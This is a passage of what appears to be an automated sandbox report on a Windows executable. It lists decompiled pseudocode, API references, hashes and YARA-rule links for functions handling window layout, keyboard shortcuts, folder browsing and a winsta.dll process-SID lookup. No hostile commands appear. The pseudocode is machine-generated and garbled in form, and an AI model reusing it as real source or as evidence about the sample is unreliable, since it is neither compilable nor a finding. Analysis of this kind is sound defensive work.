                                                                                                                    • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 87%
                                                                                                                    			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                                                                    0x0040aba8
                                                                                                                    0x0040aba9
                                                                                                                    0x0040abb0
                                                                                                                    0x0040abb2
                                                                                                                    0x0040abb5
                                                                                                                    0x0040ac19
                                                                                                                    0x0040ac2c
                                                                                                                    0x0040ac2e
                                                                                                                    0x0040ac36
                                                                                                                    0x0040ac39
                                                                                                                    0x0040ac39
                                                                                                                    0x0040ac1b
                                                                                                                    0x0040ac21
                                                                                                                    0x0040ac21
                                                                                                                    0x0040abb7
                                                                                                                    0x0040abcb
                                                                                                                    0x0040abce
                                                                                                                    0x0040abd7
                                                                                                                    0x0040abe6
                                                                                                                    0x0040abf6
                                                                                                                    0x0040abfe
                                                                                                                    0x0040ac09
                                                                                                                    0x0040ac0f
                                                                                                                    0x0040ac12
                                                                                                                    0x0040ac4f

                                                                                                                    APIs
                                                                                                                    • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                      • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                      • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                      • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 2498372239-3993045852
                                                                                                                    • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                    • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                    • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                    • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                                                    0x00403a7d
                                                                                                                    0x00403a8c
                                                                                                                    0x00403a9c
                                                                                                                    0x00403aba
                                                                                                                    0x00403adf
                                                                                                                    0x00403ae7
                                                                                                                    0x00403af4
                                                                                                                    0x00403af4
                                                                                                                    0x00403ae7
                                                                                                                    0x00403aba
                                                                                                                    0x00403a9c
                                                                                                                    0x00403b13

                                                                                                                    APIs
                                                                                                                    • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                      • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                    • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: State$CallMessageProcSendWindow
                                                                                                                    • String ID: A
                                                                                                                    • API String ID: 3924021322-3554254475
                                                                                                                    • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                    • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                    • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                    • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                                                                    0x004034f0
                                                                                                                    0x004034f8
                                                                                                                    0x00403506
                                                                                                                    0x00403516
                                                                                                                    0x0040351c
                                                                                                                    0x00403531
                                                                                                                    0x00403537
                                                                                                                    0x00403545
                                                                                                                    0x0040354a
                                                                                                                    0x00403556
                                                                                                                    0x00403567
                                                                                                                    0x00403575
                                                                                                                    0x00403583
                                                                                                                    0x00403583
                                                                                                                    0x00403586
                                                                                                                    0x00403592
                                                                                                                    0x00403598
                                                                                                                    0x004035ac

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                      • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                      • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                      • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                      • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                    • memset.MSVCRT ref: 00403537
                                                                                                                    • _ultow.MSVCRT ref: 00403575
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@$memset$_ultow
                                                                                                                    • String ID: cf@$q
                                                                                                                    • API String ID: 3448780718-2693627795
                                                                                                                    • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                    • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                    • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                    • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                                                    0x00407e2d
                                                                                                                    0x00407e46
                                                                                                                    0x00407e48
                                                                                                                    0x00407e4d
                                                                                                                    0x00407e5f
                                                                                                                    0x00407e6b
                                                                                                                    0x00407e6f
                                                                                                                    0x00407e75
                                                                                                                    0x00407e7c
                                                                                                                    0x00407e7d
                                                                                                                    0x00407e88
                                                                                                                    0x00407e8d
                                                                                                                    0x00407e8e
                                                                                                                    0x00407eaa

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00407E48
                                                                                                                    • memset.MSVCRT ref: 00407E5F
                                                                                                                      • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                      • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                    • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                    • String ID: </%s>
                                                                                                                    • API String ID: 3400436232-259020660
                                                                                                                    • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                    • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                    • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                    • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 77%
                                                                                                                    			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                                                    0x00405e0a
                                                                                                                    0x00405e12
                                                                                                                    0x00405e18
                                                                                                                    0x00405e1c
                                                                                                                    0x00405e1e
                                                                                                                    0x00405e1e
                                                                                                                    0x00405e24
                                                                                                                    0x00405e2c
                                                                                                                    0x00405e2e
                                                                                                                    0x00405e44
                                                                                                                    0x00405e49
                                                                                                                    0x00405e4c
                                                                                                                    0x00405e4d
                                                                                                                    0x00405e68
                                                                                                                    0x00405e74
                                                                                                                    0x00405e74
                                                                                                                    0x00000000
                                                                                                                    0x00405e84
                                                                                                                    0x00405e8c

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                    • String ID: caption
                                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                                    • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                    • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                    • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                    • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                                                    0x00409a4a
                                                                                                                    0x00409a4f
                                                                                                                    0x00409a56
                                                                                                                    0x00409a5e
                                                                                                                    0x00409a60
                                                                                                                    0x00409a6e
                                                                                                                    0x00409a6e
                                                                                                                    0x00409a60
                                                                                                                    0x00409a71
                                                                                                                    0x00409a76
                                                                                                                    0x00000000
                                                                                                                    0x00409a78
                                                                                                                    0x00000000
                                                                                                                    0x00409a89

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                      • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                      • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                    • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                    • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                    • API String ID: 946536540-379566740
                                                                                                                    • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                    • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                    • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                    • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040588E, Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E0040588E(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					_push( ~(0 | _t58 > 0x00000000) | _t24);
					L0040B26C();
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						_push(_t33);
						L0040B272();
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}















                                                                                                                    0x0040588e
                                                                                                                    0x0040588f
                                                                                                                    0x0040588f
                                                                                                                    0x00405892
                                                                                                                    0x00405896
                                                                                                                    0x004058a9
                                                                                                                    0x004058a9
                                                                                                                    0x004058ad
                                                                                                                    0x004058af
                                                                                                                    0x004058b5
                                                                                                                    0x004058b6
                                                                                                                    0x004058b9
                                                                                                                    0x004058c2
                                                                                                                    0x004058c3
                                                                                                                    0x004058c8
                                                                                                                    0x004058d2
                                                                                                                    0x004058d4
                                                                                                                    0x004058d9
                                                                                                                    0x004058e0
                                                                                                                    0x004058ea
                                                                                                                    0x004058ec
                                                                                                                    0x004058ed
                                                                                                                    0x004058f2
                                                                                                                    0x004058f9
                                                                                                                    0x00405902
                                                                                                                    0x00405898
                                                                                                                    0x00405898
                                                                                                                    0x0040589a
                                                                                                                    0x0040589c
                                                                                                                    0x004058a1
                                                                                                                    0x004058a2
                                                                                                                    0x004058a5
                                                                                                                    0x004058a7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004058a7
                                                                                                                    0x00405912
                                                                                                                    0x00405915
                                                                                                                    0x0040591e
                                                                                                                    0x0040591e
                                                                                                                    0x00405907
                                                                                                                    0x0040590b

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1865533344-0
                                                                                                                    • Opcode ID: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                    • Instruction ID: bfbe461037e943c94cde62efea7f8de8011d206b5eb27adb1998baad11e83e26
                                                                                                                    • Opcode Fuzzy Hash: 842e7f25b611a1b365b40b1c94d0ccd91a374462c013338e9ea48621bac1a915
                                                                                                                    • Instruction Fuzzy Hash: 9F116A722046019FD328DF2DC881A2BF7E5EFD8300B248C2EE49A97395DB35E801CB58
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040ACFC, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 37%
                                                                                                                    			E0040ACFC(wchar_t* __esi, char _a4, intOrPtr _a8) {
				void* _v8;
				wchar_t* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				long _v564;
				char* _t18;
				char* _t22;
				wchar_t* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr _t30;
				void* _t35;
				char* _t36;

				_t18 =  &_v8;
				_t30 = 0;
				__imp__SHGetMalloc(_t18);
				if(_t18 >= 0) {
					_v40 = _a4;
					_v28 = _a8;
					_t22 =  &_v40;
					_v36 = 0;
					_v32 = 0;
					_v24 = 4;
					_v20 = E0040AC81;
					_v16 = __esi;
					__imp__SHBrowseForFolderW(_t22, _t35);
					_t36 = _t22;
					if(_t36 != 0) {
						_t23 =  &_v564;
						__imp__SHGetPathFromIDListW(_t36, _t23);
						if(_t23 != 0) {
							_t30 = 1;
							wcscpy(__esi,  &_v564);
						}
						_t24 = _v8;
						 *((intOrPtr*)( *_t24 + 0x14))(_t24, _t36);
						_t26 = _v8;
						 *((intOrPtr*)( *_t26 + 8))(_t26);
					}
				}
				return _t30;
			}




















                                                                                                                    0x0040ad06
                                                                                                                    0x0040ad0a
                                                                                                                    0x0040ad0c
                                                                                                                    0x0040ad14
                                                                                                                    0x0040ad19
                                                                                                                    0x0040ad1f
                                                                                                                    0x0040ad23
                                                                                                                    0x0040ad27
                                                                                                                    0x0040ad2a
                                                                                                                    0x0040ad2d
                                                                                                                    0x0040ad34
                                                                                                                    0x0040ad3b
                                                                                                                    0x0040ad3e
                                                                                                                    0x0040ad44
                                                                                                                    0x0040ad48
                                                                                                                    0x0040ad4a
                                                                                                                    0x0040ad52
                                                                                                                    0x0040ad5a
                                                                                                                    0x0040ad64
                                                                                                                    0x0040ad65
                                                                                                                    0x0040ad6b
                                                                                                                    0x0040ad6c
                                                                                                                    0x0040ad73
                                                                                                                    0x0040ad76
                                                                                                                    0x0040ad7c
                                                                                                                    0x0040ad7c
                                                                                                                    0x0040ad7f
                                                                                                                    0x0040ad84

                                                                                                                    APIs
                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 0040AD0C
                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040AD3E
                                                                                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AD52
                                                                                                                    • wcscpy.MSVCRT ref: 0040AD65
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.277653150.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277699953.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277717086.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000006.00000002.277738901.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3917621476-0
                                                                                                                    • Opcode ID: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                    • Instruction ID: e4c3f7e47c5e56e8be22c5f757262c1ae757d72ab7f138bc7c026954c7aa5c2b
                                                                                                                    • Opcode Fuzzy Hash: 2a6e8ca006a625361a9e73932945a98b974e7be3bf153fbb13282c81ef302996
                                                                                                                    • Instruction Fuzzy Hash: B011FAB5900208EFDB10EFA9D9889AEB7F8FF48300F10416AE905E7240D738DA05CFA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                                    0x00404a62
                                                                                                                    0x00404a6a
                                                                                                                    0x00404a6e
                                                                                                                    0x00404a71
                                                                                                                    0x00404a74
                                                                                                                    0x00404a92
                                                                                                                    0x00404a92
                                                                                                                    0x00404a76
                                                                                                                    0x00404a76
                                                                                                                    0x00404a87
                                                                                                                    0x00404a90
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00404a90
                                                                                                                    0x00404aa3
                                                                                                                    0x00404aa7
                                                                                                                    0x00404aa7
                                                                                                                    0x00404a94
                                                                                                                    0x00404a98

                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32 ref: 00404A52
                                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.277669865.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
